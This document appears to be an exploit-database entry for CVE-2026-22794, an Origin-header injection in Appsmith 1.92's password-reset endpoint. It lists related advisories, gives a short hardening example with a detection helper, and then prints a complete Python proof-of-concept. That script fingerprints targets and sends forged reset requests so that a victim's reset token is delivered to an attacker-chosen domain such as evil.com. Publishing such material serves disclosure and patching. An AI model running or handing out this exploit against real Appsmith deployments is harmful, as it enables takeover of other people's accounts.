| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Origin Validation Error in Appsmith | 23 Jan 2026 15:10 | – | githubexploit |
| CVE-2026-22794 | 12 Jan 2026 23:00 | – | circl |
| Appsmith access control error vulnerability | 12 Jan 2026 00:00 | – | cnnvd |
| CVE-2026-22794 | 12 Jan 2026 21:54 | – | cve |
| CVE-2026-22794 Account Takeover Vulnerability in Appsmith | 12 Jan 2026 21:54 | – | cvelist |
| EUVD-2026-1997 | 12 Jan 2026 21:54 | – | euvd |
| CVE-2026-22794 | 12 Jan 2026 22:16 | – | nvd |
| BIT-APPSMITH-2026-22794 Account Takeover Vulnerability in Appsmith | 14 Jan 2026 08:37 | – | osv |
| CVE-2026-22794 Account Takeover Vulnerability in Appsmith | 12 Jan 2026 21:54 | – | osv |
| PT-2026-2309 | 12 Jan 2026 00:00 | – | ptsecurity |
=============================================================================================================================================
| # Title : Appsmith 1.92 Origin Header Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.appsmith.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214539/ & CVE-2026-22794
[+] Summary : A critical vulnerability in Appsmith (version 1.92) allows an unauthenticated attacker to manipulate the Origin HTTP header during the password reset process.
Because Appsmith trusts this client-supplied header, it builds the password reset link from the injected origin. The attacker only needs to trigger a reset request for a known
user email: the victim receives a legitimate-looking reset email whose link points at the attacker's domain, and if the victim follows it the reset token is delivered to the
attacker's server, which can then complete the reset and take over the account without ever authenticating.
The issue affects the /api/v1/users/forgotPassword endpoint and can be exploited remotely.
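To make the flaw class concrete, the following is an added Python example, not Appsmith's own code and not part of the original advisory. It builds a reset link the vulnerable way (base URL taken from the client's Origin) beside a hardened version that only honours an allow-listed origin and otherwise falls back to the server's configured base URL, and it adds a detection helper that flags reset requests whose Origin is not allow-listed. The function names, the /user/resetPassword path, the configured base URL, the allow-list and the sample token are all assumptions made for the example.

```python
"""Reset-link construction: trusted-Origin pattern beside a hardened one.

Added example, not Appsmith's code. Names, paths, base URL, allow-list and the
sample token below are assumptions made for illustration.
"""
from urllib.parse import urlsplit, urlunsplit

# Constructed configuration (assumption): the public URL the operator deployed
# Appsmith under, plus any additional front-end origins that are legitimate.
CONFIGURED_BASE_URL = "https://appsmith.example.com"
ALLOWED_ORIGINS = {"https://appsmith.example.com", "https://app.example.com"}
RESET_PATH = "/user/resetPassword"          # assumed reset page path
FORGOT_PASSWORD_ENDPOINT = "/api/v1/users/forgotPassword"


def build_reset_link_vulnerable(headers, token):
    """The flaw class: whatever the client sends as Origin becomes the link base.

    An attacker who posts to forgotPassword with Origin: https://evil.example
    gets the victim's reset token mailed out inside a link to evil.example.
    """
    origin = headers.get("Origin") or CONFIGURED_BASE_URL
    return f"{origin}{RESET_PATH}?token={token}"


def _normalize_origin(value):
    """Return 'scheme://host[:port]' for a well-formed http(s) origin, else None.

    Rejects 'null', bare hostnames, and origins carrying a path, query or
    fragment, so that only an exact scheme+host(+port) can match the allow-list.
    """
    if not value:
        return None
    parts = urlsplit(value.strip())
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        return None
    return urlunsplit((parts.scheme, parts.netloc.lower(), "", "", ""))


def build_reset_link_hardened(headers, token):
    """Use the client Origin only when it exactly matches an allow-listed
    origin; in every other case the link is built from the configured base URL,
    so a forged header can never redirect the token to an attacker host."""
    origin = _normalize_origin(headers.get("Origin"))
    base = origin if origin in ALLOWED_ORIGINS else CONFIGURED_BASE_URL
    return f"{base}{RESET_PATH}?token={token}"


def is_suspicious_reset_request(method, path, headers):
    """Detection helper: a forgotPassword POST whose Origin is missing,
    malformed or not allow-listed is worth alerting on."""
    if method.upper() != "POST" or path != FORGOT_PASSWORD_ENDPOINT:
        return False
    origin = _normalize_origin(headers.get("Origin"))
    return origin not in ALLOWED_ORIGINS


def reset_link_host(link):
    """Hostname the reset token would be sent to if the victim clicks."""
    return urlsplit(link).hostname


def demo():
    """Run the forged request through both builders (constructed input)."""
    token = "t0k3n-constructed"
    forged = {"Origin": "https://evil.example", "Content-Type": "application/json"}
    return {
        "vulnerable": build_reset_link_vulnerable(forged, token),
        "hardened": build_reset_link_hardened(forged, token),
        "flagged": is_suspicious_reset_request("POST", FORGOT_PASSWORD_ENDPOINT, forged),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The hardened builder deliberately never lets a request header choose the host the token is mailed to: the client's Origin can only select among origins the operator already configured, and anything else collapses to the configured base URL. The same discipline applies to Host and X-Forwarded-Host when a reverse proxy sits in front of the application. The detection helper is intentionally strict (a missing Origin on a browser-driven reset form is itself unusual); relax it for API clients that legitimately omit the header.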
[+] POC : python poc.py
#!/usr/bin/env python3
# CVE-2026-22794 PoC - Appsmith Origin header injection on /api/v1/users/forgotPassword
import argparse
import json
import re
import sys

import requests
import urllib3

# Self-hosted targets are often reached with verify=False; silence the TLS warning noise.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

USER_AGENT = "Mozilla/5.0 (compatible; ExploitPoC/1.0)"
VULN_PATH = "/api/v1/users/forgotPassword"
LAST_VULNERABLE = (1, 92)


def parse_version(page_text):
    """Extract the Appsmith version advertised in the client bundle as a tuple of ints.

    Tuples compare correctly (v1.100 > v1.92); a float() comparison would get that wrong.
    """
    match = re.search(r"parseConfig\('v([0-9]+(?:\.[0-9]+)*)'\)", page_text)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def check_vulnerable(target_url):
    """Fingerprint the target and compare its advertised version against 1.92."""
    headers = {"User-Agent": USER_AGENT}
    try:
        r = requests.get(target_url.rstrip("/") + "/", headers=headers, timeout=10, verify=False)
    except requests.RequestException as e:
        print(f"[-] Error checking: {e}")
        return False

    if r.status_code != 200 or "Appsmith" not in r.text:
        print("[-] Not an Appsmith instance or unreachable")
        return False

    version = parse_version(r.text)
    if version is None:
        print("[?] Version not found - assuming vulnerable if Appsmith detected")
        return True
    label = ".".join(str(p) for p in version)
    if version <= LAST_VULNERABLE:
        print(f"[+] Target is vulnerable! Version: v{label}")
        return True
    print(f"[-] Target is patched (version: v{label})")
    return False


def exploit(target_url, email, evil_domain):
    """Request a password reset for `email` with a forged Origin header.

    On a vulnerable instance the reset email's link is built from that Origin, so the
    victim's token is delivered to evil_domain when the link is followed.
    """
    headers = {
        "Origin": f"https://{evil_domain}",
        "Content-Type": "application/json",
        "User-Agent": USER_AGENT,
    }
    payload = {"email": email}
    full_url = f"{target_url.rstrip('/')}{VULN_PATH}"
    print(f"[*] Sending malicious reset request to: {full_url}")
    print(f"[*] Target email: {email}")
    print(f"[*] Injected Origin: https://{evil_domain}")
    try:
        r = requests.post(full_url, headers=headers, json=payload, timeout=10, verify=False)
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    if r.status_code in (200, 201, 202) and "success" in r.text.lower():
        print(f"[+] Exploit succeeded! Status: {r.status_code}")
        print(
            f"[+] Check email for reset link — it should point to your evil domain "
            f"(e.g., https://{evil_domain}/... )"
        )
        print("[+] If user clicks, token leaks to your server → takeover account.")
        if r.text.strip():
            try:
                print("\nResponse body:\n" + "-" * 60)
                print(json.dumps(r.json(), indent=4))
                print("-" * 60)
            except ValueError:
                print("[!] Response is not valid JSON")
        return True

    print(f"[-] Failed - Status: {r.status_code} (may be patched or invalid email)")
    print(r.text[:500])
    return False


def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-22794 PoC - Appsmith Origin Injection by indoushka"
    )
    parser.add_argument(
        "--target",
        required=True,
        help="Target Appsmith URL (e.g. https://appsmith.target.com)",
    )
    parser.add_argument(
        "--email",
        help="Target user email (e.g. [email protected]) - required for exploit",
    )
    parser.add_argument(
        "--evil_domain",
        help="Your attacker domain (e.g. evil.com) - required for exploit",
    )
    parser.add_argument(
        "--check",
        action="store_true",
        help="Check if vulnerable without exploiting",
    )
    args = parser.parse_args()

    if args.check:
        sys.exit(0 if check_vulnerable(args.target) else 1)
    if not args.email or not args.evil_domain:
        parser.error("--email and --evil_domain are required for exploitation")
    sys.exit(0 if exploit(args.target, args.email, args.evil_domain) else 1)


if __name__ == "__main__":
    main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================